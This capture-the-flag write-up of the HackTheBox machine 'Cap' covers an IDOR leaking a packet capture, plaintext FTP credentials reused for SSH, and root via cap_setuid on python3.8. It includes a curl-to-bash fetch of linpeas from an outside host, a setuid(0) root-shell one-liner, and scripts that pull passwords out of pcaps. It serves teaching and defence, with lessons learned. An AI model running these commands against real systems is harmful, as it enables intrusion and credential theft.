Cap Writeup

0x5t
Security Researcher
Team: RaptX
Joined: 2024
Tags: HackTheBox, Linux, FTP, IDOR, SSH

Synopsis

Cap is an easy Linux machine that runs an HTTP server used for administrative functions, including network traffic captures. An insecure direct object reference vulnerability allows access to another user's capture, which contains plaintext FTP credentials for the user "nathan." These credentials can be used to gain an SSH shell. Privilege escalation is achieved by exploiting a Linux capability on the Python binary.


Quick Metadata

Item           Value
Machine        Cap
Difficulty     Easy
IP             10.10.10.10
OS             Linux
Primary Vulns  Insecure Direct Object Reference (IDOR), Linux file capabilities (cap_setuid)

Exploitation Chain (High-Level)

  1. Network and web enumeration to discover an administrative dashboard.
  2. Exploit an Insecure Direct Object Reference (IDOR) to download another user's packet capture.
  3. Analyze the packet capture to find plaintext FTP credentials.
  4. Use the discovered credentials to log in via SSH for a user shell.
  5. Exploit a Linux capability on the Python binary to escalate privileges to root.

Pre-Reqs

  • Tooling: nmap, curl, ftp, wireshark, python3, linpeas.sh
  • Skills: web enumeration, packet analysis, Linux capabilities

Skills Required

  • Web enumeration
  • Packet capture analysis

Skills Learned

  • Insecure Direct Object Reference (IDOR)
  • Exploiting Linux capabilities

Enumeration

Network Scan

Nmap reveals three open ports: FTP on 21, SSH on 22, and an HTTP server running Gunicorn on port 80.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp open  http    gunicorn

Nmap Commands

nmap -p- --min-rate 1000 -Pn -T4 10.10.10.10
nmap -p21,22,80 -Pn -sC -sV 10.10.10.10

Web Enumeration

The HTTP service on port 80 hosts an administrative dashboard. Exploring the pages reveals views of the server's IP configuration and network status, output that suggests the application runs system commands on the backend. A "Security Snapshot" feature captures network traffic on the server for a short period and offers the resulting pcap file for download.

Service-Specific Enumeration

Anonymous FTP login is refused, so the FTP service is set aside until valid credentials turn up elsewhere.

Credentials / Artifacts Discovered

Stage     Credential / Token      Usage
Foothold  nathan:Buck3tH4TF0RM3!  FTP login recovered from the pcap; reused for SSH

Foothold

The packet capture feature stores each snapshot under a sequential numeric ID and serves it at /data/<id>. The server only checks that the ID exists, not that the requesting user created that capture, which is a textbook Insecure Direct Object Reference (IDOR). Creating a new snapshot yields the next ID; requesting /data/0 instead returns a capture taken before the attacker's session. Downloading that file and opening it in Wireshark reveals unencrypted FTP traffic.

Initial Vulnerability (IDOR)

# Access an old packet capture via IDOR
curl http://10.10.10.10/data/0 -o capture.pcap

Opening capture.pcap in Wireshark with the display filter ftp (or following the TCP stream on port 21) shows the user "nathan" logging in to FTP, with the password sent in clear text.

Time      Source       Destination  Protocol  Info
4.126500  10.10.10.10  10.10.10.10  FTP       Request: USER nathan
5.424998  10.10.10.10  10.10.10.10  FTP       Request: PASS Buck3tH4TF0RM3!
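
The same extraction can be done without Wireshark. The script below is an added example, not part of the original writeup: using only the Python standard library it parses the libpcap container and the Ethernet, IPv4 and TCP headers itself, then pairs each FTP USER command with the PASS that follows on the same connection. The embedded capture is constructed to mirror the login above; the client address 10.10.14.5 and port 50000 are assumptions, and the server address 10.10.10.10 is taken from the metadata table.

```python
import re
import struct

LINKTYPE_ETHERNET = 1
# An FTP control command sent by the client: "USER <arg>\r\n" or "PASS <arg>\r\n"
FTP_CMD = re.compile(rb"^(USER|PASS) ([^\r\n]+)\r\n")


def _tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame for the constructed sample (checksums left zero)."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)          # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap raw frames in a little-endian libpcap file (magic 0xa1b2c3d4, version 2.4, Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        # per-packet header: ts_sec, ts_usec, incl_len, orig_len
        out += struct.pack("<IIII", i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_segments(pcap_bytes):
    """Yield (src, dst, sport, dport, payload) for every IPv4/TCP packet in a classic pcap file."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    link_type, = struct.unpack_from(endian + "I", pcap_bytes, 20)
    if link_type != LINKTYPE_ETHERNET:
        raise ValueError("only the Ethernet link type is handled")
    offset = 24
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap_bytes, offset)
        offset += 16
        frame = pcap_bytes[offset:offset + incl_len]
        offset += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
            continue                                        # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        ip_len = struct.unpack_from("!H", frame, 16)[0]
        if frame[23] != 6:
            continue                                        # IP protocol 6 = TCP
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp_off = 14 + ihl
        sport, dport = struct.unpack_from("!HH", frame, tcp_off)
        data_off = (frame[tcp_off + 12] >> 4) * 4
        yield src, dst, sport, dport, frame[tcp_off + data_off:14 + ip_len]


def extract_ftp_credentials(pcap_bytes, ftp_port=21):
    """Return (server, user, password) for every USER/PASS pair sent to the FTP control port."""
    creds, pending = [], {}
    for src, dst, sport, dport, payload in iter_tcp_segments(pcap_bytes):
        m = FTP_CMD.match(payload) if dport == ftp_port else None
        if not m:
            continue
        cmd, arg = m.group(1), m.group(2).decode("utf-8", "replace")
        key = (src, sport, dst)                             # one FTP control connection
        if cmd == b"USER":
            pending[key] = arg
        elif key in pending:
            creds.append((dst, pending.pop(key), arg))
    return creds


def sample_capture():
    """Constructed capture mirroring the login found on the box; 10.10.14.5:50000 is an assumed client."""
    client, server = "10.10.14.5", "10.10.10.10"

    def c2s(data):
        return _tcp_frame(client, server, 50000, 21, data)

    def s2c(data):
        return _tcp_frame(server, client, 21, 50000, data)

    return build_pcap([
        s2c(b"220 (vsFTPd 3.0.3)\r\n"),
        c2s(b"USER nathan\r\n"),
        s2c(b"331 Please specify the password.\r\n"),
        c2s(b"PASS Buck3tH4TF0RM3!\r\n"),
        s2c(b"230 Login successful.\r\n"),
        c2s(b"SYST\r\n"),
    ])


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_capture()
    for server, user, password in extract_ftp_credentials(data):
        print(f"{server}  {user}:{password}")
```

Run it without arguments to decode the constructed sample, or pass the downloaded file (python3 ftp_creds.py capture.pcap) to scan a real capture. Only classic pcap is parsed; a pcapng file can be converted with Wireshark's Save As or editcap first.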

vsftpd here authenticates against local system accounts, so nathan's FTP password is also his login password: the credentials nathan:Buck3tH4TF0RM3! work over SSH and give a user shell.

SSH Login

ssh nathan@10.10.10.10

Result: shell as nathan.

Shell Stabilization

python3 -c 'import pty,os; pty.spawn("/bin/bash")'
export TERM=xterm

Privilege Escalation

Vector 1: Linux Capabilities

Running linpeas.sh (or simply getcap -r / 2>/dev/null) reveals that /usr/bin/python3.8 carries the cap_setuid and cap_net_bind_service file capabilities.

Evidence:

curl http://11.11.11.11/linpeas.sh | bash
<SNIP>

Files with capabilities:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
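
Reading getcap output by eye works on a three-line box but not on a real estate, so the following added example (not part of the writeup or of linpeas) parses getcap lines and flags binaries whose permitted set contains a capability that leads directly to root. It accepts both the older "path = caps+eip" output and the libcap 2.41+ "path caps=eip" output. The sample input is the three lines reported above plus one constructed line (/opt/tools/dumper) in the newer format, included only to show the second parser path.

```python
import re
import sys

# Capabilities that, in a binary's permitted set, give anyone who can execute that
# binary a direct or near-direct route to root. Based on capabilities(7); not exhaustive.
DANGEROUS = {
    "cap_setuid": "call setuid(0) in-process, as done against python3.8 here",
    "cap_setgid": "call setgid(0)/setgroups() into privileged groups",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow or /root/.ssh/id_rsa",
    "cap_dac_override": "bypass read/write/execute permission checks",
    "cap_chown": "take ownership of arbitrary files",
    "cap_fowner": "bypass owner checks, e.g. chmod on root-owned files",
    "cap_sys_admin": "mount, namespaces and many other root-equivalent operations",
    "cap_sys_ptrace": "attach to and inject code into root-owned processes",
    "cap_sys_module": "load kernel modules",
    "cap_setfcap": "grant file capabilities to other binaries",
}

# One capability clause: comma-separated names, an operator, then e/i/p flags,
# e.g. "cap_setuid,cap_net_bind_service+eip" or "cap_net_raw=ep".
CLAUSE = re.compile(r"([a-z0-9_,]+)([+=-])([eip]*)")


def parse_getcap_line(line):
    """Parse one getcap line into (path, {capability: set of flag letters}).

    Handles 'path = caps+eip' (older libcap) and 'path caps=eip' (libcap >= 2.41)."""
    line = line.strip()
    if " = " in line:
        path, spec = line.split(" = ", 1)
    else:
        path, _, spec = line.partition(" ")
    flags = {}
    for names, op, fl in CLAUSE.findall(spec):
        for name in names.split(","):
            cur = flags.setdefault(name, set())
            if op == "=":               # '=' replaces the flag set for these names
                cur.clear()
                cur.update(fl)
            elif op == "+":
                cur.update(fl)
            else:
                cur.difference_update(fl)
    return path, flags


def triage(getcap_output):
    """Return (path, capability, effective) for each dangerous capability in a permitted set.

    effective=True means the bit is raised on exec, so plain code like os.setuid(0) works;
    effective=False still matters, because a capability-aware program can raise it itself."""
    findings = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, flags = parse_getcap_line(line)
        for cap, fl in flags.items():
            if cap in DANGEROUS and "p" in fl:
                findings.append((path, cap, "e" in fl))
    return findings


# The three lines reported on the box, plus one constructed line in the newer getcap
# format (permitted-only cap_dac_read_search) to exercise the second parser path.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/opt/tools/dumper cap_dac_read_search=p
"""

if __name__ == "__main__":
    # Typical use on a target: getcap -r / 2>/dev/null | python3 cap_triage.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for path, cap, effective in triage(text):
        state = "effective" if effective else "permitted only"
        print(f"{path}: {cap} ({state}) -> {DANGEROUS[cap]}")
```

On the defensive side the fix is the reverse operation: setcap -r /usr/bin/python3.8 strips the file capabilities. A service that genuinely needs a low port should get cap_net_bind_service alone, on its own dedicated binary, never cap_setuid on a general-purpose interpreter.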

The +eip suffix means the listed capabilities sit in the file's effective, inheritable and permitted sets, so every process that executes this binary starts with them active. cap_setuid in particular lets the process call setuid(0) and become root without the binary having the SUID bit set or being owned by root. On a general-purpose interpreter such as Python this is equivalent to a SUID-root shell, because the interpreter runs whatever code its caller supplies. A one-line Python script is enough to gain a root shell.

Exploit:

# Run the capability-bearing interpreter and call setuid(0) from inside it
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

After running the Python code, the id command confirms root privileges. The gid stays 1001(nathan) because only the uid was changed (the binary has cap_setuid but not cap_setgid), but uid 0 is all that is needed to read /root.

root@cap:/tmp# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

Result: Obtained root privileges.


Root Flag

cat /root/root.txt

Hash / Flag: {REDACTED}


Summary

  1. Network enumeration revealed a web server on port 80 with an administrative dashboard.
  2. An IDOR vulnerability was discovered in the packet capture feature, allowing the download of an old packet capture.
  3. The old capture file contained plaintext credentials for the user nathan, which were used to log in via SSH.
  4. Privilege escalation was achieved by exploiting the cap_setuid Linux capability on the /usr/bin/python3.8 binary to gain a root shell.

Lessons Learned

  • Every object fetched by a client-supplied ID needs a server-side ownership or authorization check; an unguessable or incrementing ID is not access control.
  • Packet captures routinely contain plaintext credentials for legacy protocols such as FTP, and must be protected as carefully as the traffic they record.
  • File capabilities on a general-purpose interpreter, cap_setuid in particular, are equivalent to a SUID-root binary and should be audited with getcap -r / alongside the usual SUID search.
